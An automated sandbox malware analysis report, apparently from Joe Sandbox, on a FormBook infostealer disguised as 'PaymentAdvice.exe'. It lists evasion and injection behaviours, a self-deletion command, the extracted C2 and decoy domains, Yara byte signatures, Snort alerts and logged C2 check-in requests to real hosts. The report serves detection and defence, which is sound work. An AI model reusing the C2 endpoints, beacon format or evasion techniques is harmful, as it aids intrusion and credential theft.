
Analysis Report PaymentAdvice.exe

Overview

General Information

Sample Name: PaymentAdvice.exe
Analysis ID: 383926
MD5: 91937d3f9e93657c18129ff519b7f340
SHA1: d9acfebf2120d984d76bdf883094707305897691
SHA256: 397fd95899f186c1385818c6b996f4cb410e266a84b2c134104d01675a822e27
Tags: exe, Formbook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PaymentAdvice.exe (PID: 2852 cmdline: 'C:\Users\user\Desktop\PaymentAdvice.exe' MD5: 91937D3F9E93657C18129FF519B7F340)
    • PaymentAdvice.exe (PID: 5412 cmdline: 'C:\Users\user\Desktop\PaymentAdvice.exe' MD5: 91937D3F9E93657C18129FF519B7F340)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 5748 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 5964 cmdline: /c del 'C:\Users\user\Desktop\PaymentAdvice.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.saturnkorp.net/c22b/"], "decoy": ["westendjanakpuri.com", "sylvianicolades.com", "xhvai.com", "vitalinfusionofarizona.com", "orangeecho.com", "middletonyork.net", "nature-powered.com", "securemanchester.com", "hispanicalinguablog.com", "vtz6whu5254xb1.xyz", "forceshutdown.com", "apointlessspace.net", "wildsoulsport.com", "baa-bee.com", "unmanglement.com", "njtiy.com", "misery-indexrain.com", "buybox.guru", "abolishlawinforcement.com", "healthforherraleigh.clinic", "merakart.com", "thetrentproject.com", "tobaccoroadinvitational.com", "sgdivergence.com", "skmoil.com", "bornforbetterthings.com", "tianyulian.com", "pwjol.com", "roab.store", "thebellabloom.com", "innerpeacehabits.com", "curtex.info", "worshipher.net", "puebloregentseniorliving.com", "profoundai.net", "yupinduoge.com", "draftsofsilence.com", "plataformaporelmarcanario.com", "grandrapidshemorrhoidclinic.com", "crossfut.net", "cobourgautoglass.com", "whowetrust.com", "anchor-little.com", "antiqollection.com", "wvregistration.com", "droplites.com", "creditiscrucial.com", "simdikikitap.com", "deltaeleveight.com", "webinast.com", "brandschutzglas.com", "brightsidebeans.com", "weatherdekniagara.com", "dajiangzhibo12.com", "transporteyflete.com", "dulzdude.com", "tmancar.com", "tristatecandlesupply.net", "thehealthierdonut.com", "francacheladesigns.com", "enerav.com", "highsiddityminks.com", "aitelco.net", "prulib.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
19 further entries not shown.

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.PaymentAdvice.exe.2680000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.PaymentAdvice.exe.2680000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.PaymentAdvice.exe.2680000.1.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
2.2.PaymentAdvice.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.PaymentAdvice.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
13 further entries not shown.

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.saturnkorp.net/c22b/?GPi8=IngE1hDMC0iOqAB1zwheuQ4ABgAGAsEfCrT5hUpQaIJD49WyqmbZ7MrR+3GjstBYa8fc&ary=tXLpzhFpgBj4m | Avira URL Cloud: Label: malware
Source: http://www.abolishlawinforcement.com/c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&ary=tXLpzhFpgBj4m | Avira URL Cloud: Label: malware
Source: www.saturnkorp.net/c22b/ | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: PaymentAdvice.exe | Virustotal: Detection: 32%
Source: PaymentAdvice.exe | ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match | File source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: PaymentAdvice.exe | Joe Sandbox ML: detected
Source: 2.2.PaymentAdvice.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.msiexec.exe.95a558.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.msiexec.exe.4b47960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.1.PaymentAdvice.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.PaymentAdvice.exe.2680000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: PaymentAdvice.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: msiexec.pdb | source: PaymentAdvice.exe, 00000002.00000002.278128222.000000000073A000.00000004.00000020.sdmp
Source: Binary string: msiexec.pdbGCTL | source: PaymentAdvice.exe, 00000002.00000002.278128222.000000000073A000.00000004.00000020.sdmp
Source: Binary string: C:\xampp\htdocs\Cryptor\78a9904c70914141b6b07ca4fbdcf1ff\Loader\Loader\Release\u58v4wo87.pdb | source: PaymentAdvice.exe, 00000000.00000002.238262176.0000000073CA2000.00000002.00020000.sdmp, ic4muy4.dll.0.dr
Source: Binary string: wntdll.pdbUGP | source: PaymentAdvice.exe, 00000000.00000003.229993167.000000001F100000.00000004.00000001.sdmp, PaymentAdvice.exe, 00000002.00000002.278191881.00000000009D0000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.502133269.0000000004610000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: PaymentAdvice.exe, msiexec.exe
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 0_2_004026BC FindFirstFileA,
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 66.96.162.131:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 66.96.162.131:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 66.96.162.131:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 108.167.140.96:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 108.167.140.96:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 108.167.140.96:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 52.142.208.184:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 52.142.208.184:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 52.142.208.184:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49740 -> 199.59.242.153:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49740 -> 199.59.242.153:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49740 -> 199.59.242.153:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49741 -> 154.90.117.58:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49741 -> 154.90.117.58:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49741 -> 154.90.117.58:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.saturnkorp.net/c22b/
Performs DNS queries to domains with low reputation
Source: DNS query: www.vtz6whu5254xb1.xyz
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&ary=tXLpzhFpgBj4m HTTP/1.1; Host: www.abolishlawinforcement.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=1WYFPCFAa+jpHIB9BnILU4C06qq5pGhvLsRWbgBa8h/dn7fbRDy+A9fX1Fi0Jb7woXre&ary=tXLpzhFpgBj4m HTTP/1.1; Host: www.webinast.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=nmIfUlNr6AQSQgrNMPV2VDC5u2FNL4+2gZJ90khVvz7x9MdM6XesChhiT43O23KpZGxC&ary=tXLpzhFpgBj4m HTTP/1.1; Host: www.puebloregentseniorliving.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=3e8gwkl9NTrwQEJIdtc/OIQW/HZWnYYyjZ9yyX4Ij6bEtyT7BmhmgR072GygdN+xOVfM&ary=tXLpzhFpgBj4m HTTP/1.1; Host: www.brandschutzglas.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=HpleEjmznmAp1mnh3ErPpAEFAwO205ds9NqRbSfPQGhA2yUrvNOqRplXRPY5sqn9sB27&ary=tXLpzhFpgBj4m HTTP/1.1; Host: www.hispanicalinguablog.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=SZiv1CvNDlpERXMbnn5ZLbcWCJQi367u53ErGxikwJhkUqcV+jft+FDyZI7mP4A7IH+s&ary=tXLpzhFpgBj4m HTTP/1.1; Host: www.unmanglement.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=zx0k4ABwBL0XDo/z29LcJNBul5/He8j/Xs403vcVS0JFFGbo2Kaumu3jNTCDwIeMd1g7&ary=tXLpzhFpgBj4m HTTP/1.1; Host: www.plataformaporelmarcanario.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=5+EjqSxxsqb+AO0KDJIwjNuki1nPzn2WfN0f4mrczTU8JzwykOabyZiChtG34yjy1Q0j&ary=tXLpzhFpgBj4m HTTP/1.1; Host: www.dajiangzhibo12.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=IngE1hDMC0iOqAB1zwheuQ4ABgAGAsEfCrT5hUpQaIJD49WyqmbZ7MrR+3GjstBYa8fc&ary=tXLpzhFpgBj4m HTTP/1.1; Host: www.saturnkorp.net; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /c22b/?GPi8=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ71wwJK0guSYZ&ary=tXLpzhFpgBj4m HTTP/1.1; Host: www.sgdivergence.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View | IP Address: 199.59.242.153
Source: Joe Sandbox View | ASN Name: BODIS-NJUS
Source: Joe Sandbox View | ASN Name: GOOGLE-2US
Source: Joe Sandbox View | ASN Name: WORLD4YOUAT
Source: C:\Windows\explorer.exe | Code function: 3_2_070A7302 getaddrinfo,setsockopt,recv,
Source: unknown | DNS traffic detected: queries for: www.abolishlawinforcement.com
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.264957707.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: C:\Users\user\Desktop\PaymentAdvice.exe | Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,
Source: PaymentAdvice.exe, 00000000.00000002.237618535.0000000000A9A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
